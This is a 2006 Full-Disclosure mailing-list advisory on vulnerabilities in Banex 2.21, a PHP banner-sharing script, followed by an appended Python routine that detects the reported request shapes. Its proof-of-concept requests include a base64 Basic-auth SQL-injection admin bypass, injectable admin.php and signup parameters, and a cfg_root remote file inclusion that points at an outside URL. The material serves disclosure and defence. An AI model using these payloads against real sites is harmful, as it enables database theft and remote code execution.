List: full-disclosure
Subject: [Full-disclosure] Banex Multiple Vulnerabilities
From: SirDarckCat <sirdarckcat () gmail ! com>
Date: 2006-07-30 4:42:36
Message-ID: 8ba534860607292142v59450c31l430d65424ca3967b () mail ! gmail ! com
Discovered by Sirdarckcat from elhacker.net
Banex 2.21
http://sourceforge.net/projects/banex
==============================================
Banex is a simple script for sharing banners
across multiple websites.
Anyway, it has multiple vulnerabilities.
==============================================
1.- Sensitive Information Disclosure
PoC:
http://www.server.com/inc/lib.inc
No protection, and it contains the DB name, password and user.
==============================================
2.- SQL injection
PoC:
GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
==============================================
3.- SQL injection
PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/*
==============================================
4.- SQL injection **** EVEN WITH MAGIC ON ****
PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
Same bug in context SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]
Same bug, in context DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
==============================================
5.- Remote File Inclusion:
PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?
==============================================
Att.
Sirdarckcat
elhacker.net
--
Att.
SirDarckCat@GMail.com
http://www.google.com/search?q=sirdarckcat
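The three request shapes in this advisory (SQL metacharacters smuggled in the Basic-auth username, a non-numeric `id` that magic_quotes cannot neutralise, and a client-supplied `cfg_root`) can be caught in front of the application with a small request check. The following is an added detection example, not code from Banex or from the advisory; it reads the real `Authorization` header (the PoC above spells it "Authentication"), assumes a plain dict of headers, and uses the advisory's own parameter names as the list of values that must be integers.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows used unquoted in SQL: anything but digits is suspicious.
NUMERIC_PARAMS = {"id", "deleteuser", "deleteuserbanner", "viewmem", "viewmemunb", "viewunmem"}
SQL_META = re.compile(r"['\"#;]|--|/\*|\b(?:or|and|union|select)\b", re.IGNORECASE)


def decode_basic(header):
    """Return (user, password) from an 'Authorization: Basic <b64>' value, or None."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        user, _, pw = base64.b64decode(token, validate=True).decode("latin-1").partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    return user, pw


def inspect_request(path, headers):
    """Return a list of (finding, detail) for one request to Banex's admin/signup/members scripts.

    `headers` is assumed to be a dict keyed by the canonical header name.
    """
    findings = []
    params = parse_qsl(urlsplit(path).query, keep_blank_values=True)
    # Item 2: the SQL payload travels inside the Basic-auth username, not the URL.
    auth = headers.get("Authorization")
    creds = decode_basic(auth) if auth else None
    if creds and SQL_META.search(creds[0]):
        findings.append(("sqli-basic-auth", creds[0]))
    for name, value in params:
        # Item 4: magic_quotes only escapes quotes; an unquoted numeric context needs none,
        # so the check (and the fix) is "is it an integer?", not "does it contain a quote?".
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.append(("sqli-numeric-param", f"{name}={value}"))
        elif value and SQL_META.search(value):
            findings.append(("sqli-string-param", f"{name}={value}"))
        # Item 5: cfg_root is an internal include prefix and must never come from the client.
        if name == "cfg_root":
            findings.append(("rfi-cfg_root", value))
    return findings
```

The decoded Basic-auth username from the advisory's own PoC is what the first check flags; a legitimate `id=17` produces no finding.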
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/